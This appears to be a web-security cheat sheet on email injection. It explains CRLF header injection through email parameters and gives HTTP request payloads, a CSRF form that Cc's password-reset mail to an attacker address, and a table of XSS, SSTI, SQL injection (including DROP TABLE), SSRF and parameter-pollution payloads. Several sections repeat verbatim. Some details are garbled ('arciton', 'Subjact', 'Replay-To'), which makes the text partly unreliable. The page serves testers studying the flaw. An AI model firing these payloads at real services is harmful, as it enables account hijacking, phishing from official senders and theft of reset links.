Email Injection is an attack method in which the input value received from the user in the application is used to process the email, and if the verification of the input value is insufficient, the attacker can tamper with the contents of the mail with malicious parameters.
{
"email":"sender@domain.com%0ACc:attacker@domain.com"
}
If the attack is successful, it can be used for impersonating an official account or phishing, and depending on the system involved, it can be used for account hijacking.
POST /invite HTTP/1.1
email=hahwul@gmail.com
When the value received through the email parameter is transmitted through a mail transmission system such as SMTP, if there is no verification of the input value, the sender/recipient and contents of the email can be altered using CRLF (newline character).
POST /invite HTTP/1.1
email=hahwul@gmail.com%0ASubject:Fake%20Subject
Refer: Various exploiting techniques using E-mail format
POST /invite HTTP/1.1
email=victim@domain.com%0ACc:attacker@domain.com
If the attack code is configured so that data can be delivered to the attacker's email as Cc through Email Injection when requesting to generate the email, when the victim accesses the CSRF code, the password regeneration link can also be transmitted to the attacker's email, resulting in issues such as account hijacking. can be connected with
<form arciton="https://weakness-service/findPassword" method="post">
<input type=text name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>
POST /notify HTTP/1.1
email=victim@domain.com%0ASubjact:Important%20Security%20Alerts%0A%0AFake%20Message!
In addition, when user input values are inserted into the mail body, the service can deliver unintended mails using HTML tags and CSS.
POST /notify HTTP/1.1
email=victim@domain.com&name=alice<br>Please%20Click%20Me<!--
In this case, similar to Command Injection, if special character processing is insufficient during the process, it may eventually lead to RCE.
{
"email":"sender@domain.com%0ACc:attacker@domain.com"
}
If the attack is successful, it can be used for impersonating an official account or phishing, and depending on the system involved, it can be used for account hijacking.
🗡 Offensive techniques
Detect
All sections where emails are sent after web requests, such as invitations and notifications, can be affected by Email Injection.POST /invite HTTP/1.1
email=hahwul@gmail.com
When the value received through the email parameter is transmitted through a mail transmission system such as SMTP, if there is no verification of the input value, the sender/recipient and contents of the email can be altered using CRLF (newline character).
POST /invite HTTP/1.1
email=hahwul@gmail.com%0ASubject:Fake%20Subject
Exploitation
Common Vuln
Type | Payload |
---|---|
XSS | test+(<script>alert(0)</script>)@example.comtest@example(<script>alert(0)</script>).com"<script>alert(0)</script>"@example.com |
SSTI | "<%= 7 * 7 %>"@example.comtest+(${{7*7}})@example.com |
SQLi | "' OR 1=1 -- '"@example.com"mail'); DROP TABLE users;--"@example.com |
SSRF (Era of ssrf) | john.doe@abc123.burpcollaborator.netjohn.doe@[127.0.0.1] |
Parameter pollution | victim&email=[attacker@example.com](mailto:attacker@example.com) |
Email header injection | "%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com |
Wildcard abuse | %@example.com |
Stealing sensitive inforamation
When combined with vulnerabilities such as CSRF, it is possible to steal sensitive information such as e-mail generated when resetting passwords or 2FA authentication values.POST /invite HTTP/1.1
email=victim@domain.com%0ACc:attacker@domain.com
If the attack code is configured so that data can be delivered to the attacker's email as Cc through Email Injection when requesting to generate the email, when the victim accesses the CSRF code, the password regeneration link can also be transmitted to the attacker's email, resulting in issues such as account hijacking. can be connected with
<form arciton="https://weakness-service/findPassword" method="post">
<input type=text name="email" value="victim@domain.com%0ACc:attacker@domain.com">
</form>
Header/Content Injection
If emails capable of Email Injection are sent to official accounts such as noreply@blahblah, phishing emails can be constructed from official accounts by inserting newline characters into the mail header and manipulating Subject, Body, etc.POST /notify HTTP/1.1
email=victim@domain.com%0ASubjact:Important%20Security%20Alerts%0A%0AFake%20Message!
In addition, when user input values are inserted into the mail body, the service can deliver unintended mails using HTML tags and CSS.
POST /notify HTTP/1.1
email=victim@domain.com&name=alice<br>Please%20Click%20Me<!--
RCE
There are cases in which other mail applications are processed by command-line for mail transmission. Typically, the PHP Cli mail()Functions are similar.In this case, similar to Command Injection, if special character processing is insufficient during the process, it may eventually lead to RCE.
Tricks
- Subjact: <TITLE>: title
- Cc: <attacker mail address>: You can receive mail with CC (CC) settings
- Replay-To: <attacker mail address>: If you use Replay-to, you can designate a reply destination so you can receive mail.